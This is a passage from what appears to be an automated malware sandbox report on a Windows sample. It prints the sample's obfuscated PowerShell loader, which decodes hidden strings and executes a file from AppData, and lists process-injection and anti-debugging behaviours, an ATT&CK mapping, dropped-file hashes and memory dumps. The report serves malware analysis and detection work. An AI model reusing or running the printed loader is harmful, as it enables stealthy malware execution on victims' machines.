M3VeCAp2Ka7Sk2 TDSt2af2Du3GiC u3 UB M3 fAIn6Oc9Et7 S4Ni6Ur9Kr6 PD K0Fo1 S3 BCSt2Gr4 K2Ro8 u3ekD P2 TC R3PoAIn6Sc7No0 T0Pe2 S7 K3 RF E2Du6 F2Pe2 D2GeCUk6Al1Sb6KrD p0 S6Ra3 PFDo2 NCBe3NoBPr2 FBSp2 D6 S3UnBSt2Va7 C6Sp5 H7 F9Kr1te1Di7ScB U7HeBBa6 K5 u7le9 G6 S5Ma7 W9Bl6So5Sk7Gl9Ve6fl0 P'Ku)No;Br`$TeN Vo PnGaa RbAdsFioPer Sp DtOvi MoLjnVi2Cr=Fl`"""Ho`$MieMonFovFa:SiA TP mPphDHaAInTNeAHa\IrF EoJarSulAfiBagAns Sm SaCunBed TeBlnlas P\FiG PeshnTel IsFie An SdChe F\PaTJai Ll Pv Feopjpue SbOsrToiOmnFig Se SlDes me BrSpnMoeSt\DeL CuSac fiCidBon SeUnsEus Ge Rs F.UnTAke RlFa`"""Re; S&Py(Sk`$ PSKwoFoc KiHyaVilKoa Hr TbKae Aj FdAfe Ur AsCo7 B)Uu Sv(CuT ae Ll De Af Fo Ln SinanAcs Ft GrBju FkSgtFeiReo DnAkeDer M1 R8Be7De0 U4Ka Ac' Y6AlDSk0sa5Im3OvCOv2 M5 I3 KCGl6Ba9Br7Un4 S6 A9 S1Jy2 D1 SA C3Ra0Sp3hoANe3QuDAu2 VCTr2Ar4Sa6 i7 C0 J0 a0 N6Ce6Be7Se0 JF T2Pa0Pi2 s5 S2FoC E1Un4Mo7In3Af7 I3 P1FoBRe2 PC F2Io8Pr2PrD S0In8 D2Di5Cu2 B5Se0PeBPe3 O0 G3unDOm2 BCsu3FoA V6 F1 I6DeD S0Fe7 P2Hv6 S2 R7Ta2Al8Vo2BeBKa3UdAUn2Pr6Me3crBTe3Pi9Ca3SeDAf2 S0Sc2hj6Ny2 v7Kr7TaB V6Ch0 P' A)Ch; p`$ HPSei TlFli dnCogVi= s`$KoL KuOvl Cu s.skc roInu DnVet S- F1 S0Im2 U4Fo; T&Br(Te`$MaS GoGec RiEca KlTia Rr Sb ferejSpdKreDyrTrsTa7 M)Fo B( STTaebulToe Sf Uo HnTeiTin gs Pt Cr Ku DkBlt Ni So HnKieBlrBu1 R8ar7 C0Sp4Go Ud'Hu1Ce2 D1OpASp3Fo0Ba3 OATa3FoD k2SkCPa2Rn4 P6Re7 O1 NB P3HoCTr2Bo7Tr3TiDNa2 N0Fa2 S4He2ImC U6Ba7Ar0 H0Sr2 I7Pa3 SDAn2 SCRe3LiBTi2Po6fe3Co9Ma1 FAMa2SeCKv3GyB g3 RF F2He0Tr2DiAAn2 UCCa3 BA c6 A7 F0Sp4Ba2Ca8 F3ErB B3 PA A2La1 D2La8Ko2De5Al1Ku4 H7Co3No7Fo3Na0 NAUn2 O6Pe3 I9 B3Fa0 v6Op1Ra6DoD I0Or5Re3GaC I2 k5Bm3 RCRe6Un5 K6Kr9 S7 K8Ik7Ha9Ra7DeB H7 SD S6Fa5Ch6Mo9 S6 NDBe1Br9 e3 PCCa2 C7Sy2ReDEl2 V2St3AlC u3 FBst3 SA P6 M5Br6Kn9Sn6DaDUd1 w9Ha2 D0St2 v5 p2Cl0 N2Pr7Me2poE d6Ke0 R'Mo)Hy; T& A( B`$DiS FoGec Li BaDrl Va Sr Rb Ge Tjspd DecrrCysJo7Uv)Va Af( KTXieSkl CeFlfMao cnSyiKunAnsKltRerDeuSek StBri UoAdn He VrCr1Mi8Di7Ko0 V4St In'Em6 AD S0StA A2Kr5Ov2 H0Ve3Da9 M3 TAEn2UnC T2He7St2HaCCo3 PAaf7Su8Ho7SkFTe7HaDFe6Ef9 T7Fe4Sk6Su9 U1Pa2Ci1ApAPr3Ga0 I3KuA T3ApD B2 RC K2Sj4Sw6un7Sl1StBBa3 SC n2Sa7 U3 BD f2Me0Le2Pr4Pa2trCSp6 A7Su0Re0 U2Gu7do3 ID P2FiC U3VaBFi2 S6Bu3St9Ga1UnAMi2CaCAn3 OBPi3 CFco2As0Se2 KA I2 PC a3SiATu6 D7 D0 P4 A2Mo8 S3AtBto3TrA T2Er1 m2Su8Ps2It5Ba1 y4in7La3 S7 M3Ci0CaEMe2FoC K3FrD b0CaDSa2 bCSr2 S5 C2 nCDu2 UE I2 I8En3quDCi2SpC R0TyF H2Te6 S3StBTu0MuFUd3PlC n2 D7Vi2huAdi3SaD F2Pr0 H2 s6Sp2Li7Ek1 D9 M2Cy6 B2Ti0 P2 P7 E3 JDOp2BoCGa3FoBBe6 D1Fe6Sp1Di2SdFBe2Ou2Ou3Ur9 A6Sa9 R6 AD S0 R5 D2ToC T2 F8He3AbF L2NoC T2Ls7sc2 U5Pa2 MC I3DaAPy3StA U6mi9 O6TuD m0WaDAk2CaC M3AnB h2 J4 D2 F8 P3tuDDi3 OB C2 D6Ka3fo9Co2 L1 S2Ha0Pr2 P8Mf6Ma0 T6Gu5 R6Rj9 G6 V1Fo0 NE F0 RD F1 AD I6Ge9 P0Ni9St6 I1 F1Un2Dy0 T0 S2Op7 P3SiD I1Ca9 U3BrDAr3emBRa1Re4 F6Kr5Te6Op9Wi1Lo2 H0 K0Kr2 M7Au3 TD F1st9 L3 DD C3GeB B1Fo4 S6Ha5 L6sk9 T1 I2As0Fr0Bo2 D7 S3 CD A1re9Sl3SlDNe3BuBSc1Fa4 L6Op0 U6Ab9 U6 c1Pu1Ba2Re0 B0 K2 b7 P3UhDBi1 s9 S3AgD h3TrBCo1 M4 G6Co0st6 S0Be6 R0Ga'Me) A; C&Tr(Co`$DySSaoImcMoiTea Sl FaDerDabSpe Rjdud SeBer SsNo7 A)At Ca(SaT Re AlUneLef CoEln ci An DsSttKjr KuBekEgtBeiSuo Mn deHerDe1ar8Ra7Im0Mi4 U H' F6foD D0GaATa2St5Fr2Ri0 M3Pu9 L3 IARe2DdCTa2 D7 F2 MC M3unAOv7 H8Ka7krF H7SiDme6On7Fr0Un0Po2By7Op3MuFDi2in6 I2Ta2Vi2 DCVa6Su1Sk7 T9 F6 T5Ch6PaDBa1 R9Si3 MCSi2Mi7 K2 KD O2 o2 N3EnCAb3NoB R3UnAPi6In5 P7Gl9 U6Pl0fe' A)La# T;""";;function Nonabsorption5 ($Hexachlorethane,$Paraffinic) { &$Seaforthia0 (artemis9 ' S$LaHKreDix Pa Pc fh Al Ho SrFueBetSahova Cn TeWo Re- Sb Tx Iouor K Li$OpPCua MrElaLifavfsai AnBlifoc B ');};Function artemis9 { param([String]$Deceivers); For($Effectualness=2; $Effectualness -lt $Deceivers.Length-1; $Effectualness+=(2+1)){ $Telefoninstruktioner1871 = $Deceivers.Substring($Effectualness, 1); $Telefoninstruktioner187 = $Telefoninstruktioner187 + $Telefoninstruktioner1871; } $Telefoninstruktioner187;}$Seaforthia0 = artemis9 ' OI SEFoXTr ';&$Seaforthia0 (artemis9 $mixersignal);<#Prorsa Multiparity Rdselsfulderes #>;"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:940

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
5⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Forligsmandens\Genlsende\Tilvejebringelserne\Importunement\Smoothpate\Animate\rejselederens\Beardfishes41.Bum
Filesize
22KB

MD5
ec74bb93cc61cc8ca0f1121baa7076c2

SHA1
63d132cfe1bf81ff5ac18e7b638ede1c68e755dd

SHA256
adf930ce49873a2106de06a506126077cd12c5780aaf3034f1f604905d715c64

SHA512
2661edfcd86bdd38833156906ae0488fc5d80dbaeb345e8c366dfec407992611439c8089648e48f7dbe64d25e058ade052b8e22479c83007c192aaa5c0eb83d7

Download Submit
C:\Users\Admin\AppData\Roaming\Forligsmandens\Genlsende\Tilvejebringelserne\Lucidnesses.Tel
Filesize
288KB

MD5
a8b4f5c07d8082776a52f1b4f0f4f1d7

SHA1
43ac62008bbefd19518406d23c25d42ee391d81c

SHA256
9fe780ffdd81d0043341ac4ab10f8fda5cc422acad2fcee4cc764d598ce14901

SHA512
eb93edc282f6c9a8675e514f2263fba265d78247279229f6895e6d8b7f57922fb9529ad0a89754431f7d7c0e69dc895ac5bee060266a4cb60eb9f08de27d2311

Download Submit
C:\Users\Admin\AppData\Roaming\GHJ.exe
Filesize
427KB

MD5
8f62a1c24abe9caaed3a96b080f33ed6

SHA1
c2bfe47753df633fe764e78ad36d755a0d9f3405

SHA256
869f790d57a50f69dea8c50c016d6c2301ac8618e1abd684af127f14a6a35661

SHA512
48d63f9e6d2fcab569dcd8599940dd0d51c8792985cd40bb8397aee195a431638922fe7c3614319255330a72c909e005641f714cf535e12e69564052b602afa1

Download Submit
C:\Users\Admin\AppData\Roaming\GHJ.exe
Filesize
427KB

MD5
8f62a1c24abe9caaed3a96b080f33ed6

SHA1
c2bfe47753df633fe764e78ad36d755a0d9f3405

SHA256
869f790d57a50f69dea8c50c016d6c2301ac8618e1abd684af127f14a6a35661

SHA512
48d63f9e6d2fcab569dcd8599940dd0d51c8792985cd40bb8397aee195a431638922fe7c3614319255330a72c909e005641f714cf535e12e69564052b602afa1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9UPI18PIK55XQQPVJN8O.temp
Filesize
7KB

MD5
567b7d425c637e51b3af8bd9839afb87

SHA1
d706dd7ccbc5a3ddb1dd81278b9d33c0e17f4244

SHA256
b346137a620261aeb9d95811a19ff91933d8cb374a509a9417b1d6d152b22c48

SHA512
3223e75f722757b6515f426637ad902986be2fbff6c823f3dea939fd4f60f9b264896311e85366b83d5ab0344ec39a7d6a7be31d86fb31d32e9432df1306cbb5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
567b7d425c637e51b3af8bd9839afb87

SHA1
d706dd7ccbc5a3ddb1dd81278b9d33c0e17f4244

SHA256
b346137a620261aeb9d95811a19ff91933d8cb374a509a9417b1d6d152b22c48

SHA512
3223e75f722757b6515f426637ad902986be2fbff6c823f3dea939fd4f60f9b264896311e85366b83d5ab0344ec39a7d6a7be31d86fb31d32e9432df1306cbb5

Download Submit
\Users\Admin\AppData\Roaming\GHJ.exe
Filesize
427KB

MD5
8f62a1c24abe9caaed3a96b080f33ed6

SHA1
c2bfe47753df633fe764e78ad36d755a0d9f3405

SHA256
869f790d57a50f69dea8c50c016d6c2301ac8618e1abd684af127f14a6a35661

SHA512
48d63f9e6d2fcab569dcd8599940dd0d51c8792985cd40bb8397aee195a431638922fe7c3614319255330a72c909e005641f714cf535e12e69564052b602afa1

Download Submit
memory/940-75-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/940-73-0x0000000002800000-0x0000000002840000-memory.dmp

Filesize
256KB

Download
memory/1128-81-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-104-0x0000000000980000-0x0000000003001000-memory.dmp

Filesize
38.5MB

Download
memory/1128-76-0x0000000000980000-0x0000000003001000-memory.dmp

Filesize
38.5MB

Download
memory/1128-77-0x0000000000980000-0x0000000003001000-memory.dmp

Filesize
38.5MB

Download
memory/1128-80-0x0000000000980000-0x0000000003001000-memory.dmp

Filesize
38.5MB

Download
memory/1128-119-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-100-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-117-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-107-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-108-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-109-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-110-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-111-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-118-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-115-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1128-116-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1668-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1668-114-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1796-66-0x00000000026B0000-0x00000000026F0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads